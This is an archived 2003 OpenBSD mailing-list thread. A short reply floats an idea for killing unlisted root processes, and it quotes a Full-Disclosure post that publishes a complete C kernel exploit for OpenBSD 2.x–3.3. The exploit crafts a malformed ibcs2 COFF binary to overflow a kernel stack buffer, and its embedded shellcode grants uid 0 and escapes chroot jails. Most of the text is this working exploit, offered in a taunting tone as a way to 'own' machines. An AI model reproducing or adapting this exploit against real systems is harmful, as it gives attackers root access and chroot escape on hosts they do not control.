[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] yet another OpenBSD kernel hole ...



Because it's a local exploit, it can only happen if a malicious user has
access to the system anyway.

Aside from that, perhaps a new security feature can be introduced into
OpenBSD to (hopefully) stop these things quickly even if they are not known
about in advance.  One possible way is to introduce a feature like
/etc/shells called /etc/rootbins which lists the programs that may run as
root.  The scheduler can use an assembler routine that does a quick check
for programs running with uid=0, and if so, something not in /etc/rootbins
gets killed and root is notified.  That's pretty nasty because it would hurt
system performance, but it's a last ditch resort maybe - I have NO idea if
it would be workable.


----- Original Message -----
From: "Edward W. Ray" <support@mmicman.com>
To: <tech@openbsd.org>
Sent: Tuesday, November 18, 2003 4:05 PM
Subject: FW: [Full-Disclosure] yet another OpenBSD kernel hole ...


> Some ass posted this crap.  If this is nothing to worry about (which I
> assume it is), I figured I'd give the folks here a heads up to nip this
> idiot posting in the bud.
>
> Edward W. Ray
>
>
>
> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of
> noir@uberhax0r.net
> Sent: Monday, November 17, 2003 5:23 PM
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] yet another OpenBSD kernel hole ...
>
>
> yet another annoying day, some folk released one of my OpenBSD
> vulnerabilities.
> it is the second one he squashed in the last 2-3 weeks without even
> understanding that the first one is exploitable doh! ...
> warez trading kids made yet another round of serving theo the assrat!
>
> so now it is my honor to serve the kiddies with a robust exploit to own
> openbsd boxens the most proactively secure OS ever! ;-P
>
> attached exploit will get you uid=0 and break any possible chroot jail
your
> parent process might be in, works on all 2.x and 3.x upto 3.3.
>
> priv seperation, chroot jail, systrace yeah yeah right ;P theo and niels
> what a happy couple ...
> i will keep the systrace breaking version of the exploit private but you
got
> the idea ;)
>
> so i hope, some of you openbsd loving losers will finally get the truth
> behind your cult. it is a big LIE, aloha ????
>
>
> - noir
> /** OpenBSD 2.x - 3.3 **/
> /** exec_ibcs2_coff_prep_zmagic() kernel stack overflow **/
> /** note: ibcs2 binary compatibility with SCO and ISC is enabled **/
> /** in the default install                                       **/
>
> /** Copyright Feb 26 2003 Sinan "noir" Eren **/
> /** noir@olympos.org | noir@uberhax0r.net **/
>
> /** greets to brother nahual for making this usefull! **/
>
> #include <stdio.h>
> #include <sys/types.h>
> #include <fcntl.h>
> #include <unistd.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
> #include <sys/signal.h>
>
> //#include "ibcs2_exec.h"
>
> /* kernel_sc.s shellcode */
> /* much improved the opcode search, fixed the stupid logic bug! */
>
> unsigned char shellcode[] =
> "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
> "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
> "\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
> "\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
> "\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
> "\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
> "\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0"
> "\x75\xef\x47\x31\xc0\x57\xc3";
>
> /* do not use! */
> /*
> silvio gotta get his brain together and understand why sometimes
> you need to return to kernel code rather than setting the selectors
> pushing ss,esp,eflag,cs,eip and do an iret!
>
> well, aloha?? vnode locks being held ? mutex locks being held ?
> you have to return to the kernel code that unlocks the syncronization
> objects
>
> */
>
> unsigned char iret_shellcode[] =
> "\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
> "\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
> "\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00"
> "\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a"
> "\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00"
> "\x6a\x17";
>
> unsigned char pusheip[] =
> "\x68\x00\x00\x00\x00"; /* fill eip */
>
> unsigned char iret[] =
> "\xcf";
>
> unsigned char exitsh[] =
> "\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */
>
>
> #define ZERO(p) memset(&p, 0x00, sizeof(p))
>
> /*
>  * COFF file header
>  */
>
> struct coff_filehdr {
>     u_short     f_magic;        /* magic number */
>     u_short     f_nscns;        /* # of sections */
>     long        f_timdat;       /* timestamp */
>     long        f_symptr;       /* file offset of symbol table */
>     long        f_nsyms;        /* # of symbol table entries */
>     u_short     f_opthdr;       /* size of optional header */
>     u_short     f_flags;        /* flags */
> };
>
> /* f_magic flags */
> #define COFF_MAGIC_I386 0x14c
>
> /* f_flags */
> #define COFF_F_RELFLG   0x1
> #define COFF_F_EXEC     0x2
> #define COFF_F_LNNO     0x4
> #define COFF_F_LSYMS    0x8
> #define COFF_F_SWABD    0x40
> #define COFF_F_AR16WR   0x80
> #define COFF_F_AR32WR   0x100
>
> /*
>  * COFF system header
>  */
>
> struct coff_aouthdr {
>     short       a_magic;
>     short       a_vstamp;
>     long        a_tsize;
>     long        a_dsize;
>     long        a_bsize;
>     long        a_entry;
>     long        a_tstart;
>     long        a_dstart;
> };
>
> /* magic */
> #define COFF_ZMAGIC     0413
>
> /*
>  * COFF section header
>  */
>
> struct coff_scnhdr {
>     char        s_name[8];
>     long        s_paddr;
>     long        s_vaddr;
>     long        s_size;
>     long        s_scnptr;
>     long        s_relptr;
>     long        s_lnnoptr;
>     u_short     s_nreloc;
>     u_short     s_nlnno;
>     long        s_flags;
> };
>
> /* s_flags */
> #define COFF_STYP_TEXT          0x20
> #define COFF_STYP_DATA          0x40
> #define COFF_STYP_SHLIB         0x800
>
>
> void get_proc(pid_t, struct kinfo_proc *);
> void sig_handler();
>
> int
> main(int argc, char **argv)
> {
>   u_int i, fd, debug = 0;
>   u_char *ptr, *shptr;
>   u_long *lptr;
>   u_long pprocadr, offset;
>   struct kinfo_proc kp;
>   char *args[] = { "./ibcs2own", NULL};
>   char *envs[] = { "RIP=theo", NULL};
>   //COFF structures
>   struct coff_filehdr fhdr;
>   struct coff_aouthdr ahdr;
>   struct coff_scnhdr  scn0, scn1, scn2;
>
>    if(argv[1]) {
>       if(!strncmp(argv[1], "-v", 2))
>               debug = 1;
>       else {
>       printf("-v: verbose flag only\n");
>       exit(0);
>             }
>     }
>
>     ZERO(fhdr);
>     fhdr.f_magic = COFF_MAGIC_I386;
>     fhdr.f_nscns = 3; //TEXT, DATA, SHLIB
>     fhdr.f_timdat = 0xdeadbeef;
>     fhdr.f_symptr = 0x4000;
>     fhdr.f_nsyms = 1;
>     fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size
>     fhdr.f_flags = COFF_F_EXEC;
>
>     ZERO(ahdr);
>     ahdr.a_magic = COFF_ZMAGIC;
>     ahdr.a_tsize = 0;
>     ahdr.a_dsize = 0;
>     ahdr.a_bsize = 0;
>     ahdr.a_entry = 0x10000;
>     ahdr.a_tstart = 0;
>     ahdr.a_dstart = 0;
>
>     ZERO(scn0);
>     memcpy(&scn0.s_name, ".text", 5);
>     scn0.s_paddr = 0x10000;
>     scn0.s_vaddr = 0x10000;
>     scn0.s_size = 4096;
>     scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3);
>     //file offset of .text segment
>     scn0.s_relptr = 0;
>     scn0.s_lnnoptr = 0;
>     scn0.s_nreloc = 0;
>     scn0.s_nlnno = 0;
>     scn0.s_flags = COFF_STYP_TEXT;
>
>     ZERO(scn1);
>     memcpy(&scn1.s_name, ".data", 5);
>     scn1.s_paddr = 0x10000 - 4096;
>     scn1.s_vaddr = 0x10000 - 4096;
>     scn1.s_size = 4096;
>     scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096;
>     //file offset of .data segment
>     scn1.s_relptr = 0;
>     scn1.s_lnnoptr = 0;
>     scn1.s_nreloc = 0;
>     scn1.s_nlnno = 0;
>     scn1.s_flags = COFF_STYP_DATA;
>
>     ZERO(scn2);
>     memcpy(&scn2.s_name, ".shlib", 6);
>     scn2.s_paddr = 0;
>     scn2.s_vaddr = 0;
>     scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128
>     scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) +
2*4096;
>     //file offset of .data segment
>     scn2.s_relptr = 0;
>     scn2.s_lnnoptr = 0;
>     scn2.s_nreloc = 0;
>     scn2.s_nlnno = 0;
>     scn2.s_flags = COFF_STYP_SHLIB;
>
>     offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096;
>     ptr = (char *) malloc(offset);
>     if(!ptr) {
> perror("malloc");
> exit(-1);
>     }
>
>     memset(ptr, 0xcc, offset);  /* fill int3 */
>
>     /* copy sections */
>     offset = 0;
>     memcpy(ptr, (char *) &fhdr, sizeof(fhdr));
>     offset += sizeof(fhdr);
>
>     memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr));
>     offset += sizeof(ahdr);
>
>     memcpy(ptr+offset, (char *) &scn0, sizeof(scn0));
>     offset += sizeof(scn0);
>
>     memcpy(ptr+offset, &scn1, sizeof(scn1));
>     offset += sizeof(scn1);
>
>     memcpy(ptr+offset, (char *) &scn2, sizeof(scn2));
>     offset += sizeof(scn2);
>
>     lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \
>            (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8);
>
>     shptr = (char *) malloc(4096);
>     if(!shptr) {
> perror("malloc");
> exit(-1);
>     }
>     if(debug)
>       printf("payload adr: 0x%.8x\t", shptr);
>
>     memset(shptr, 0xcc, 4096);
>
>     get_proc((pid_t) getppid(), &kp);
>     pprocadr = (u_long) kp.kp_eproc.e_paddr;
>     if(debug)
>       printf("parent proc adr: 0x%.8x\n", pprocadr);
>
>     *lptr++ = 0xdeadbeef;
>     *lptr = (u_long) shptr;
>
>     shellcode[5] = pprocadr & 0xff;
>     shellcode[6] = (pprocadr >> 8) & 0xff;
>     shellcode[7] = (pprocadr >> 16) & 0xff;
>     shellcode[8] = (pprocadr >> 24) & 0xff;
>
>     memcpy(shptr, shellcode, sizeof(shellcode)-1);
>
>     unlink("./ibcs2own");
>     if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {
> perror("open");
> exit(-1);
> }
>
>     write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096
+
> 4096 + 4096);
>     close(fd);
>     free(ptr);
>
>     signal(SIGSEGV, (void (*)())sig_handler);
>     signal(SIGILL, (void (*)())sig_handler);
>     signal(SIGSYS, (void (*)())sig_handler);
>     signal(SIGBUS, (void (*)())sig_handler);
>     signal(SIGABRT, (void (*)())sig_handler);
>     signal(SIGTRAP, (void (*)())sig_handler);
>
>     printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n");
>     execve(args[0], args, envs);
>     perror("execve");
> }
>
> void
> sig_handler()
> {
>    _exit(0);
> }
>
> void
> get_proc(pid_t pid, struct kinfo_proc *kp)
> {
>    u_int arr[4], len;
>
>         arr[0] = CTL_KERN;
>         arr[1] = KERN_PROC;
>         arr[2] = KERN_PROC_PID;
>         arr[3] = pid;
>         len = sizeof(struct kinfo_proc);
>         if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
>                 perror("sysctl");
>                 fprintf(stderr, "this is an unexpected error, rerun!\n");
>                 exit(-1);
>         }
>
> }